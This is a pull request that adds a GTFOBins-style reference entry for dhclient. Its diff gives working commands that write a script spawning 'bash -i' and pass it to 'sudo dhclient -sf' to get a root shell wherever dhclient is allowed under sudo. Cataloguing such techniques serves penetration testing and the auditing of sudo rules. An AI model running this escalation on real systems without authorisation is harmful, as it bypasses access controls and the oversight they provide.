### PR TITLE
Create dhclient.md

### DIFF
--- a/_gtfobins/dhclient.md
+++ b/_gtfobins/dhclient.md
@@ -1,0 +1,12 @@
+---
+functions:
+  sudo:
+    - description: The below technique utilizies `dhclient`'s script file option (`-sf`) to execute arbitrary commands with `sudo`.
+      code: |
+        cat > /tmp/script.sh << EOF
+        #!/bin/bash
+        bash -i
+        EOF
+        chmod +x /tmp/script.sh
+        sudo dhclient -sf /tmp/script.sh
+---


### PR DESCRIPTION
This technique uses `dhclient`'s script file option `-sf` to execute arbitrary commands with `sudo`.

`dhclient` is a tool for DHCP and present on many linux systems.
Reference: https://linux.die.net/man/8/dhclient

